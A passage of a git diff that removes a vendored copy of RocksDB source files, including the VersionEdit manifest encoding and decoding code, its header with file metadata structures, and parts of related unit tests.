-                       GetInternalKey("750"), 200, 200, false);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(500U, new_vstorage.NumLevelBytes(2));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyDeleteAndSaveTo) {
-  UpdateVersionStorageInfo();
-
-  EnvOptions env_options;
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-
-  VersionEdit version_edit;
-  version_edit.AddFile(2, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.AddFile(2, 676, 0, 100U, GetInternalKey("401"),
-                       GetInternalKey("450"), 200, 200, false);
-  version_edit.AddFile(2, 636, 0, 100U, GetInternalKey("601"),
-                       GetInternalKey("650"), 200, 200, false);
-  version_edit.AddFile(2, 616, 0, 100U, GetInternalKey("501"),
-                       GetInternalKey("550"), 200, 200, false);
-  version_edit.AddFile(2, 606, 0, 100U, GetInternalKey("701"),
-                       GetInternalKey("750"), 200, 200, false);
-  version_builder.Apply(&version_edit);
-
-  VersionEdit version_edit2;
-  version_edit.AddFile(2, 808, 0, 100U, GetInternalKey("901"),
-                       GetInternalKey("950"), 200, 200, false);
-  version_edit2.DeleteFile(2, 616);
-  version_edit2.DeleteFile(2, 636);
-  version_edit.AddFile(2, 806, 0, 100U, GetInternalKey("801"),
-                       GetInternalKey("850"), 200, 200, false);
-  version_builder.Apply(&version_edit2);
-
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(300U, new_vstorage.NumLevelBytes(2));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, EstimatedActiveKeys) {
-  const uint32_t kTotalSamples = 20;
-  const uint32_t kNumLevels = 5;
-  const uint32_t kFilesPerLevel = 8;
-  const uint32_t kNumFiles = kNumLevels * kFilesPerLevel;
-  const uint32_t kEntriesPerFile = 1000;
-  const uint32_t kDeletionsPerFile = 100;
-  for (uint32_t i = 0; i < kNumFiles; ++i) {
-    Add(static_cast<int>(i / kFilesPerLevel), i + 1,
-        ToString((i + 100) * 1000).c_str(),
-        ToString((i + 100) * 1000 + 999).c_str(),
-        100U,  0, 100, 100,
-        kEntriesPerFile, kDeletionsPerFile,
-        (i < kTotalSamples));
-  }
-  // minus 2X for the number of deletion entries because:
-  // 1x for deletion entry does not count as a data entry.
-  // 1x for each deletion entry will actually remove one data entry.
-  ASSERT_EQ(vstorage_.GetEstimatedActiveKeys(),
-            (kEntriesPerFile - 2 * kDeletionsPerFile) * kNumFiles);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/version_edit.cc b/thirdparty/rocksdb/db/version_edit.cc
deleted file mode 100644
index b01f7bb..0000000
--- a/thirdparty/rocksdb/db/version_edit.cc
+++ /dev/null
@@ -1,591 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_edit.h"
-
-#include "db/version_set.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/event_logger.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Tag numbers for serialized VersionEdit.  These numbers are written to
-// disk and should not be changed.
-enum Tag {
-  kComparator = 1,
-  kLogNumber = 2,
-  kNextFileNumber = 3,
-  kLastSequence = 4,
-  kCompactPointer = 5,
-  kDeletedFile = 6,
-  kNewFile = 7,
-  // 8 was used for large value refs
-  kPrevLogNumber = 9,
-
-  // these are new formats divergent from open source leveldb
-  kNewFile2 = 100,
-  kNewFile3 = 102,
-  kNewFile4 = 103,      // 4th (the latest) format version of adding files
-  kColumnFamily = 200,  // specify column family for version edit
-  kColumnFamilyAdd = 201,
-  kColumnFamilyDrop = 202,
-  kMaxColumnFamily = 203,
-};
-
-enum CustomTag {
-  kTerminate = 1,  // The end of customized fields
-  kNeedCompaction = 2,
-  kPathId = 65,
-};
-// If this bit for the custom tag is set, opening DB should fail if
-// we don't know this field.
-uint32_t kCustomTagNonSafeIgnoreMask = 1 << 6;
-
-uint64_t PackFileNumberAndPathId(uint64_t number, uint64_t path_id) {
-  assert(number <= kFileNumberMask);
-  return number | (path_id * (kFileNumberMask + 1));
-}
-
-void VersionEdit::Clear() {
-  comparator_.clear();
-  max_level_ = 0;
-  log_number_ = 0;
-  prev_log_number_ = 0;
-  last_sequence_ = 0;
-  next_file_number_ = 0;
-  max_column_family_ = 0;
-  has_comparator_ = false;
-  has_log_number_ = false;
-  has_prev_log_number_ = false;
-  has_next_file_number_ = false;
-  has_last_sequence_ = false;
-  has_max_column_family_ = false;
-  deleted_files_.clear();
-  new_files_.clear();
-  column_family_ = 0;
-  is_column_family_add_ = 0;
-  is_column_family_drop_ = 0;
-  column_family_name_.clear();
-}
-
-bool VersionEdit::EncodeTo(std::string* dst) const {
-  if (has_comparator_) {
-    PutVarint32(dst, kComparator);
-    PutLengthPrefixedSlice(dst, comparator_);
-  }
-  if (has_log_number_) {
-    PutVarint32Varint64(dst, kLogNumber, log_number_);
-  }
-  if (has_prev_log_number_) {
-    PutVarint32Varint64(dst, kPrevLogNumber, prev_log_number_);
-  }
-  if (has_next_file_number_) {
-    PutVarint32Varint64(dst, kNextFileNumber, next_file_number_);
-  }
-  if (has_last_sequence_) {
-    PutVarint32Varint64(dst, kLastSequence, last_sequence_);
-  }
-  if (has_max_column_family_) {
-    PutVarint32Varint32(dst, kMaxColumnFamily, max_column_family_);
-  }
-
-  for (const auto& deleted : deleted_files_) {
-    PutVarint32Varint32Varint64(dst, kDeletedFile, deleted.first /* level */,
-                                deleted.second /* file number */);
-  }
-
-  for (size_t i = 0; i < new_files_.size(); i++) {
-    const FileMetaData& f = new_files_[i].second;
-    if (!f.smallest.Valid() || !f.largest.Valid()) {
-      return false;
-    }
-    bool has_customized_fields = false;
-    if (f.marked_for_compaction) {
-      PutVarint32(dst, kNewFile4);
-      has_customized_fields = true;
-    } else if (f.fd.GetPathId() == 0) {
-      // Use older format to make sure user can roll back the build if they
-      // don't config multiple DB paths.
-      PutVarint32(dst, kNewFile2);
-    } else {
-      PutVarint32(dst, kNewFile3);
-    }
-    PutVarint32Varint64(dst, new_files_[i].first /* level */, f.fd.GetNumber());
-    if (f.fd.GetPathId() != 0 && !has_customized_fields) {
-      // kNewFile3
-      PutVarint32(dst, f.fd.GetPathId());
-    }
-    PutVarint64(dst, f.fd.GetFileSize());
-    PutLengthPrefixedSlice(dst, f.smallest.Encode());
-    PutLengthPrefixedSlice(dst, f.largest.Encode());
-    PutVarint64Varint64(dst, f.smallest_seqno, f.largest_seqno);
-    if (has_customized_fields) {
-      // Customized fields' format:
-      // +-----------------------------+
-      // | 1st field's tag (varint32)  |
-      // +-----------------------------+
-      // | 1st field's size (varint32) |
-      // +-----------------------------+
-      // |    bytes for 1st field      |
-      // |  (based on size decoded)    |
-      // +-----------------------------+
-      // |                             |
-      // |          ......             |
-      // |                             |
-      // +-----------------------------+
-      // | last field's size (varint32)|
-      // +-----------------------------+
-      // |    bytes for last field     |
-      // |  (based on size decoded)    |
-      // +-----------------------------+
-      // | terminating tag (varint32)  |
-      // +-----------------------------+
-      //
-      // Customized encoding for fields:
-      //   tag kPathId: 1 byte as path_id
-      //   tag kNeedCompaction:
-      //        now only can take one char value 1 indicating need-compaction
-      //
-      if (f.fd.GetPathId() != 0) {
-        PutVarint32(dst, CustomTag::kPathId);
-        char p = static_cast<char>(f.fd.GetPathId());
-        PutLengthPrefixedSlice(dst, Slice(&p, 1));
-      }
-      if (f.marked_for_compaction) {
-        PutVarint32(dst, CustomTag::kNeedCompaction);
-        char p = static_cast<char>(1);
-        PutLengthPrefixedSlice(dst, Slice(&p, 1));
-      }
-      TEST_SYNC_POINT_CALLBACK("VersionEdit::EncodeTo:NewFile4:CustomizeFields",
-                               dst);
-
-      PutVarint32(dst, CustomTag::kTerminate);
-    }
-  }
-
-  // 0 is default and does not need to be explicitly written
-  if (column_family_ != 0) {
-    PutVarint32Varint32(dst, kColumnFamily, column_family_);
-  }
-
-  if (is_column_family_add_) {
-    PutVarint32(dst, kColumnFamilyAdd);
-    PutLengthPrefixedSlice(dst, Slice(column_family_name_));
-  }
-
-  if (is_column_family_drop_) {
-    PutVarint32(dst, kColumnFamilyDrop);
-  }
-  return true;
-}
-
-static bool GetInternalKey(Slice* input, InternalKey* dst) {
-  Slice str;
-  if (GetLengthPrefixedSlice(input, &str)) {
-    dst->DecodeFrom(str);
-    return dst->Valid();
-  } else {
-    return false;
-  }
-}
-
-bool VersionEdit::GetLevel(Slice* input, int* level, const char** msg) {
-  uint32_t v;
-  if (GetVarint32(input, &v)) {
-    *level = v;
-    if (max_level_ < *level) {
-      max_level_ = *level;
-    }
-    return true;
-  } else {
-    return false;
-  }
-}
-
-const char* VersionEdit::DecodeNewFile4From(Slice* input) {
-  const char* msg = nullptr;
-  int level;
-  FileMetaData f;
-  uint64_t number;
-  uint32_t path_id = 0;
-  uint64_t file_size;
-  if (GetLevel(input, &level, &msg) && GetVarint64(input, &number) &&
-      GetVarint64(input, &file_size) && GetInternalKey(input, &f.smallest) &&
-      GetInternalKey(input, &f.largest) &&
-      GetVarint64(input, &f.smallest_seqno) &&
-      GetVarint64(input, &f.largest_seqno)) {
-    // See comments in VersionEdit::EncodeTo() for format of customized fields
-    while (true) {
-      uint32_t custom_tag;
-      Slice field;
-      if (!GetVarint32(input, &custom_tag)) {
-        return "new-file4 custom field";
-      }
-      if (custom_tag == kTerminate) {
-        break;
-      }
-      if (!GetLengthPrefixedSlice(input, &field)) {
-        return "new-file4 custom field lenth prefixed slice error";
-      }
-      switch (custom_tag) {
-        case kPathId:
-          if (field.size() != 1) {
-            return "path_id field wrong size";
-          }
-          path_id = field[0];
-          if (path_id > 3) {
-            return "path_id wrong vaue";
-          }
-          break;
-        case kNeedCompaction:
-          if (field.size() != 1) {
-            return "need_compaction field wrong size";
-          }
-          f.marked_for_compaction = (field[0] == 1);
-          break;
-        default:
-          if ((custom_tag & kCustomTagNonSafeIgnoreMask) != 0) {
-            // Should not proceed if cannot understand it
-            return "new-file4 custom field not supported";
-          }
-          break;
-      }
-    }
-  } else {
-    return "new-file4 entry";
-  }
-  f.fd = FileDescriptor(number, path_id, file_size);
-  new_files_.push_back(std::make_pair(level, f));
-  return nullptr;
-}
-
-Status VersionEdit::DecodeFrom(const Slice& src) {
-  Clear();
-  Slice input = src;
-  const char* msg = nullptr;
-  uint32_t tag;
-
-  // Temporary storage for parsing
-  int level;
-  FileMetaData f;
-  Slice str;
-  InternalKey key;
-
-  while (msg == nullptr && GetVarint32(&input, &tag)) {
-    switch (tag) {
-      case kComparator:
-        if (GetLengthPrefixedSlice(&input, &str)) {
-          comparator_ = str.ToString();
-          has_comparator_ = true;
-        } else {
-          msg = "comparator name";
-        }
-        break;
-
-      case kLogNumber:
-        if (GetVarint64(&input, &log_number_)) {
-          has_log_number_ = true;
-        } else {
-          msg = "log number";
-        }
-        break;
-
-      case kPrevLogNumber:
-        if (GetVarint64(&input, &prev_log_number_)) {
-          has_prev_log_number_ = true;
-        } else {
-          msg = "previous log number";
-        }
-        break;
-
-      case kNextFileNumber:
-        if (GetVarint64(&input, &next_file_number_)) {
-          has_next_file_number_ = true;
-        } else {
-          msg = "next file number";
-        }
-        break;
-
-      case kLastSequence:
-        if (GetVarint64(&input, &last_sequence_)) {
-          has_last_sequence_ = true;
-        } else {
-          msg = "last sequence number";
-        }
-        break;
-
-      case kMaxColumnFamily:
-        if (GetVarint32(&input, &max_column_family_)) {
-          has_max_column_family_ = true;
-        } else {
-          msg = "max column family";
-        }
-        break;
-
-      case kCompactPointer:
-        if (GetLevel(&input, &level, &msg) &&
-            GetInternalKey(&input, &key)) {
-          // we don't use compact pointers anymore,
-          // but we should not fail if they are still
-          // in manifest
-        } else {
-          if (!msg) {
-            msg = "compaction pointer";
-          }
-        }
-        break;
-
-      case kDeletedFile: {
-        uint64_t number;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number)) {
-          deleted_files_.insert(std::make_pair(level, number));
-        } else {
-          if (!msg) {
-            msg = "deleted file";
-          }
-        }
-        break;
-      }
-
-      case kNewFile: {
-        uint64_t number;
-        uint64_t file_size;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number) &&
-            GetVarint64(&input, &file_size) &&
-            GetInternalKey(&input, &f.smallest) &&
-            GetInternalKey(&input, &f.largest)) {
-          f.fd = FileDescriptor(number, 0, file_size);
-          new_files_.push_back(std::make_pair(level, f));
-        } else {
-          if (!msg) {
-            msg = "new-file entry";
-          }
-        }
-        break;
-      }
-      case kNewFile2: {
-        uint64_t number;
-        uint64_t file_size;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number) &&
-            GetVarint64(&input, &file_size) &&
-            GetInternalKey(&input, &f.smallest) &&
-            GetInternalKey(&input, &f.largest) &&
-            GetVarint64(&input, &f.smallest_seqno) &&
-            GetVarint64(&input, &f.largest_seqno)) {
-          f.fd = FileDescriptor(number, 0, file_size);
-          new_files_.push_back(std::make_pair(level, f));
-        } else {
-          if (!msg) {
-            msg = "new-file2 entry";
-          }
-        }
-        break;
-      }
-
-      case kNewFile3: {
-        uint64_t number;
-        uint32_t path_id;
-        uint64_t file_size;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number) &&
-            GetVarint32(&input, &path_id) && GetVarint64(&input, &file_size) &&
-            GetInternalKey(&input, &f.smallest) &&
-            GetInternalKey(&input, &f.largest) &&
-            GetVarint64(&input, &f.smallest_seqno) &&
-            GetVarint64(&input, &f.largest_seqno)) {
-          f.fd = FileDescriptor(number, path_id, file_size);
-          new_files_.push_back(std::make_pair(level, f));
-        } else {
-          if (!msg) {
-            msg = "new-file3 entry";
-          }
-        }
-        break;
-      }
-
-      case kNewFile4: {
-        msg = DecodeNewFile4From(&input);
-        break;
-      }
-
-      case kColumnFamily:
-        if (!GetVarint32(&input, &column_family_)) {
-          if (!msg) {
-            msg = "set column family id";
-          }
-        }
-        break;
-
-      case kColumnFamilyAdd:
-        if (GetLengthPrefixedSlice(&input, &str)) {
-          is_column_family_add_ = true;
-          column_family_name_ = str.ToString();
-        } else {
-          if (!msg) {
-            msg = "column family add";
-          }
-        }
-        break;
-
-      case kColumnFamilyDrop:
-        is_column_family_drop_ = true;
-        break;
-
-      default:
-        msg = "unknown tag";
-        break;
-    }
-  }
-
-  if (msg == nullptr && !input.empty()) {
-    msg = "invalid tag";
-  }
-
-  Status result;
-  if (msg != nullptr) {
-    result = Status::Corruption("VersionEdit", msg);
-  }
-  return result;
-}
-
-std::string VersionEdit::DebugString(bool hex_key) const {
-  std::string r;
-  r.append("VersionEdit {");
-  if (has_comparator_) {
-    r.append("\n  Comparator: ");
-    r.append(comparator_);
-  }
-  if (has_log_number_) {
-    r.append("\n  LogNumber: ");
-    AppendNumberTo(&r, log_number_);
-  }
-  if (has_prev_log_number_) {
-    r.append("\n  PrevLogNumber: ");
-    AppendNumberTo(&r, prev_log_number_);
-  }
-  if (has_next_file_number_) {
-    r.append("\n  NextFileNumber: ");
-    AppendNumberTo(&r, next_file_number_);
-  }
-  if (has_last_sequence_) {
-    r.append("\n  LastSeq: ");
-    AppendNumberTo(&r, last_sequence_);
-  }
-  for (DeletedFileSet::const_iterator iter = deleted_files_.begin();
-       iter != deleted_files_.end();
-       ++iter) {
-    r.append("\n  DeleteFile: ");
-    AppendNumberTo(&r, iter->first);
-    r.append(" ");
-    AppendNumberTo(&r, iter->second);
-  }
-  for (size_t i = 0; i < new_files_.size(); i++) {
-    const FileMetaData& f = new_files_[i].second;
-    r.append("\n  AddFile: ");
-    AppendNumberTo(&r, new_files_[i].first);
-    r.append(" ");
-    AppendNumberTo(&r, f.fd.GetNumber());
-    r.append(" ");
-    AppendNumberTo(&r, f.fd.GetFileSize());
-    r.append(" ");
-    r.append(f.smallest.DebugString(hex_key));
-    r.append(" .. ");
-    r.append(f.largest.DebugString(hex_key));
-  }
-  r.append("\n  ColumnFamily: ");
-  AppendNumberTo(&r, column_family_);
-  if (is_column_family_add_) {
-    r.append("\n  ColumnFamilyAdd: ");
-    r.append(column_family_name_);
-  }
-  if (is_column_family_drop_) {
-    r.append("\n  ColumnFamilyDrop");
-  }
-  if (has_max_column_family_) {
-    r.append("\n  MaxColumnFamily: ");
-    AppendNumberTo(&r, max_column_family_);
-  }
-  r.append("\n}\n");
-  return r;
-}
-
-std::string VersionEdit::DebugJSON(int edit_num, bool hex_key) const {
-  JSONWriter jw;
-  jw << "EditNumber" << edit_num;
-
-  if (has_comparator_) {
-    jw << "Comparator" << comparator_;
-  }
-  if (has_log_number_) {
-    jw << "LogNumber" << log_number_;
-  }
-  if (has_prev_log_number_) {
-    jw << "PrevLogNumber" << prev_log_number_;
-  }
-  if (has_next_file_number_) {
-    jw << "NextFileNumber" << next_file_number_;
-  }
-  if (has_last_sequence_) {
-    jw << "LastSeq" << last_sequence_;
-  }
-
-  if (!deleted_files_.empty()) {
-    jw << "DeletedFiles";
-    jw.StartArray();
-
-    for (DeletedFileSet::const_iterator iter = deleted_files_.begin();
-         iter != deleted_files_.end();
-         ++iter) {
-      jw.StartArrayedObject();
-      jw << "Level" << iter->first;
-      jw << "FileNumber" << iter->second;
-      jw.EndArrayedObject();
-    }
-
-    jw.EndArray();
-  }
-
-  if (!new_files_.empty()) {
-    jw << "AddedFiles";
-    jw.StartArray();
-
-    for (size_t i = 0; i < new_files_.size(); i++) {
-      jw.StartArrayedObject();
-      jw << "Level" << new_files_[i].first;
-      const FileMetaData& f = new_files_[i].second;
-      jw << "FileNumber" << f.fd.GetNumber();
-      jw << "FileSize" << f.fd.GetFileSize();
-      jw << "SmallestIKey" << f.smallest.DebugString(hex_key);
-      jw << "LargestIKey" << f.largest.DebugString(hex_key);
-      jw.EndArrayedObject();
-    }
-
-    jw.EndArray();
-  }
-
-  jw << "ColumnFamily" << column_family_;
-
-  if (is_column_family_add_) {
-    jw << "ColumnFamilyAdd" << column_family_name_;
-  }
-  if (is_column_family_drop_) {
-    jw << "ColumnFamilyDrop" << column_family_name_;
-  }
-  if (has_max_column_family_) {
-    jw << "MaxColumnFamily" << max_column_family_;
-  }
-
-  jw.EndObject();
-
-  return jw.Get();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_edit.h b/thirdparty/rocksdb/db/version_edit.h
deleted file mode 100644
index 47ebf5b..0000000
--- a/thirdparty/rocksdb/db/version_edit.h
+++ /dev/null
@@ -1,309 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <algorithm>
-#include <set>
-#include <utility>
-#include <vector>
-#include <string>
-#include "rocksdb/cache.h"
-#include "db/dbformat.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class VersionSet;
-
-const uint64_t kFileNumberMask = 0x3FFFFFFFFFFFFFFF;
-
-extern uint64_t PackFileNumberAndPathId(uint64_t number, uint64_t path_id);
-
-// A copyable structure contains information needed to read data from an SST
-// file. It can contains a pointer to a table reader opened for the file, or
-// file number and size, which can be used to create a new table reader for it.
-// The behavior is undefined when a copied of the structure is used when the
-// file is not in any live version any more.
-struct FileDescriptor {
-  // Table reader in table_reader_handle
-  TableReader* table_reader;
-  uint64_t packed_number_and_path_id;
-  uint64_t file_size;  // File size in bytes
-
-  FileDescriptor() : FileDescriptor(0, 0, 0) {}
-
-  FileDescriptor(uint64_t number, uint32_t path_id, uint64_t _file_size)
-      : table_reader(nullptr),
-        packed_number_and_path_id(PackFileNumberAndPathId(number, path_id)),
-        file_size(_file_size) {}
-
-  FileDescriptor& operator=(const FileDescriptor& fd) {
-    table_reader = fd.table_reader;
-    packed_number_and_path_id = fd.packed_number_and_path_id;
-    file_size = fd.file_size;
-    return *this;
-  }
-
-  uint64_t GetNumber() const {
-    return packed_number_and_path_id & kFileNumberMask;
-  }
-  uint32_t GetPathId() const {
-    return static_cast<uint32_t>(
-        packed_number_and_path_id / (kFileNumberMask + 1));
-  }
-  uint64_t GetFileSize() const { return file_size; }
-};
-
-struct FileSampledStats {
-  FileSampledStats() : num_reads_sampled(0) {}
-  FileSampledStats(const FileSampledStats& other) { *this = other; }
-  FileSampledStats& operator=(const FileSampledStats& other) {
-    num_reads_sampled = other.num_reads_sampled.load();
-    return *this;
-  }
-
-  // number of user reads to this file.
-  mutable std::atomic<uint64_t> num_reads_sampled;
-};
-
-struct FileMetaData {
-  FileDescriptor fd;
-  InternalKey smallest;            // Smallest internal key served by table
-  InternalKey largest;             // Largest internal key served by table
-  SequenceNumber smallest_seqno;   // The smallest seqno in this file
-  SequenceNumber largest_seqno;    // The largest seqno in this file
-
-  // Needs to be disposed when refs becomes 0.
-  Cache::Handle* table_reader_handle;
-
-  FileSampledStats stats;
-
-  // Stats for compensating deletion entries during compaction
-
-  // File size compensated by deletion entry.
-  // This is updated in Version::UpdateAccumulatedStats() first time when the
-  // file is created or loaded.  After it is updated (!= 0), it is immutable.
-  uint64_t compensated_file_size;
-  // These values can mutate, but they can only be read or written from
-  // single-threaded LogAndApply thread
-  uint64_t num_entries;            // the number of entries.
-  uint64_t num_deletions;          // the number of deletion entries.
-  uint64_t raw_key_size;           // total uncompressed key size.
-  uint64_t raw_value_size;         // total uncompressed value size.
-
-  int refs;  // Reference count
-
-  bool being_compacted;        // Is this file undergoing compaction?
-  bool init_stats_from_file;   // true if the data-entry stats of this file
-                               // has initialized from file.
-
-  bool marked_for_compaction;  // True if client asked us nicely to compact this
-                               // file.
-
-  FileMetaData()
-      : smallest_seqno(kMaxSequenceNumber),
-        largest_seqno(0),
-        table_reader_handle(nullptr),
-        compensated_file_size(0),
-        num_entries(0),
-        num_deletions(0),
-        raw_key_size(0),
-        raw_value_size(0),
-        refs(0),
-        being_compacted(false),
-        init_stats_from_file(false),
-        marked_for_compaction(false) {}
-
-  // REQUIRED: Keys must be given to the function in sorted order (it expects
-  // the last key to be the largest).
-  void UpdateBoundaries(const Slice& key, SequenceNumber seqno) {
-    if (smallest.size() == 0) {
-      smallest.DecodeFrom(key);
-    }
-    largest.DecodeFrom(key);
-    smallest_seqno = std::min(smallest_seqno, seqno);
-    largest_seqno = std::max(largest_seqno, seqno);
-  }
-};
-
-// A compressed copy of file meta data that just contain minimum data needed
-// to server read operations, while still keeping the pointer to full metadata
-// of the file in case it is needed.
-struct FdWithKeyRange {
-  FileDescriptor fd;
-  FileMetaData* file_metadata;  // Point to all metadata
-  Slice smallest_key;    // slice that contain smallest key
-  Slice largest_key;     // slice that contain largest key
-
-  FdWithKeyRange()
-      : fd(),
-        smallest_key(),
-        largest_key() {
-  }
-
-  FdWithKeyRange(FileDescriptor _fd, Slice _smallest_key, Slice _largest_key,
-                 FileMetaData* _file_metadata)
-      : fd(_fd),
-        file_metadata(_file_metadata),
-        smallest_key(_smallest_key),
-        largest_key(_largest_key) {}
-};
-
-// Data structure to store an array of FdWithKeyRange in one level
-// Actual data is guaranteed to be stored closely
-struct LevelFilesBrief {
-  size_t num_files;
-  FdWithKeyRange* files;
-  LevelFilesBrief() {
-    num_files = 0;
-    files = nullptr;
-  }
-};
-
-class VersionEdit {
- public:
-  VersionEdit() { Clear(); }
-  ~VersionEdit() { }
-
-  void Clear();
-
-  void SetComparatorName(const Slice& name) {
-    has_comparator_ = true;
-    comparator_ = name.ToString();
-  }
-  void SetLogNumber(uint64_t num) {
-    has_log_number_ = true;
-    log_number_ = num;
-  }
-  void SetPrevLogNumber(uint64_t num) {
-    has_prev_log_number_ = true;
-    prev_log_number_ = num;
-  }
-  void SetNextFile(uint64_t num) {
-    has_next_file_number_ = true;
-    next_file_number_ = num;
-  }
-  void SetLastSequence(SequenceNumber seq) {
-    has_last_sequence_ = true;
-    last_sequence_ = seq;
-  }
-  void SetMaxColumnFamily(uint32_t max_column_family) {
-    has_max_column_family_ = true;
-    max_column_family_ = max_column_family;
-  }
-
-  // Add the specified file at the specified number.
-  // REQUIRES: This version has not been saved (see VersionSet::SaveTo)
-  // REQUIRES: "smallest" and "largest" are smallest and largest keys in file
-  void AddFile(int level, uint64_t file, uint32_t file_path_id,
-               uint64_t file_size, const InternalKey& smallest,
-               const InternalKey& largest, const SequenceNumber& smallest_seqno,
-               const SequenceNumber& largest_seqno,
-               bool marked_for_compaction) {
-    assert(smallest_seqno <= largest_seqno);
-    FileMetaData f;
-    f.fd = FileDescriptor(file, file_path_id, file_size);
-    f.smallest = smallest;
-    f.largest = largest;
-    f.smallest_seqno = smallest_seqno;
-    f.largest_seqno = largest_seqno;
-    f.marked_for_compaction = marked_for_compaction;
-    new_files_.emplace_back(level, std::move(f));
-  }
-
-  void AddFile(int level, const FileMetaData& f) {
-    assert(f.smallest_seqno <= f.largest_seqno);
-    new_files_.emplace_back(level, f);
-  }
-
-  // Delete the specified "file" from the specified "level".
-  void DeleteFile(int level, uint64_t file) {
-    deleted_files_.insert({level, file});
-  }
-
-  // Number of edits
-  size_t NumEntries() { return new_files_.size() + deleted_files_.size(); }
-
-  bool IsColumnFamilyManipulation() {
-    return is_column_family_add_ || is_column_family_drop_;
-  }
-
-  void SetColumnFamily(uint32_t column_family_id) {
-    column_family_ = column_family_id;
-  }
-
-  // set column family ID by calling SetColumnFamily()
-  void AddColumnFamily(const std::string& name) {
-    assert(!is_column_family_drop_);
-    assert(!is_column_family_add_);
-    assert(NumEntries() == 0);
-    is_column_family_add_ = true;
-    column_family_name_ = name;
-  }
-
-  // set column family ID by calling SetColumnFamily()
-  void DropColumnFamily() {
-    assert(!is_column_family_drop_);
-    assert(!is_column_family_add_);
-    assert(NumEntries() == 0);
-    is_column_family_drop_ = true;
-  }
-
-  // return true on success.
-  bool EncodeTo(std::string* dst) const;
-  Status DecodeFrom(const Slice& src);
-
-  const char* DecodeNewFile4From(Slice* input);
-
-  typedef std::set<std::pair<int, uint64_t>> DeletedFileSet;
-
-  const DeletedFileSet& GetDeletedFiles() { return deleted_files_; }
-  const std::vector<std::pair<int, FileMetaData>>& GetNewFiles() {
-    return new_files_;
-  }
-
-  std::string DebugString(bool hex_key = false) const;
-  std::string DebugJSON(int edit_num, bool hex_key = false) const;
-
- private:
-  friend class VersionSet;
-  friend class Version;
-
-  bool GetLevel(Slice* input, int* level, const char** msg);
-
-  int max_level_;
-  std::string comparator_;
-  uint64_t log_number_;
-  uint64_t prev_log_number_;
-  uint64_t next_file_number_;
-  uint32_t max_column_family_;
-  SequenceNumber last_sequence_;
-  bool has_comparator_;
-  bool has_log_number_;
-  bool has_prev_log_number_;
-  bool has_next_file_number_;
-  bool has_last_sequence_;
-  bool has_max_column_family_;
-
-  DeletedFileSet deleted_files_;
-  std::vector<std::pair<int, FileMetaData>> new_files_;
-
-  // Each version edit record should have column_family_id set
-  // If it's not set, it is default (0)
-  uint32_t column_family_;
-  // a version edit can be either column_family add or
-  // column_family drop. If it's column family add,
-  // it also includes column family name.
-  bool is_column_family_drop_;
-  bool is_column_family_add_;
-  std::string column_family_name_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_edit_test.cc b/thirdparty/rocksdb/db/version_edit_test.cc
deleted file mode 100644
index 338bb36..0000000
--- a/thirdparty/rocksdb/db/version_edit_test.cc
+++ /dev/null
@@ -1,189 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_edit.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-static void TestEncodeDecode(const VersionEdit& edit) {
-  std::string encoded, encoded2;
-  edit.EncodeTo(&encoded);
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  parsed.EncodeTo(&encoded2);
-  ASSERT_EQ(encoded, encoded2);
-}
-
-class VersionEditTest : public testing::Test {};
-
-TEST_F(VersionEditTest, EncodeDecode) {
-  static const uint64_t kBig = 1ull << 50;
-  static const uint32_t kBig32Bit = 1ull << 30;
-
-  VersionEdit edit;
-  for (int i = 0; i < 4; i++) {
-    TestEncodeDecode(edit);
-    edit.AddFile(3, kBig + 300 + i, kBig32Bit + 400 + i, 0,
-                 InternalKey("foo", kBig + 500 + i, kTypeValue),
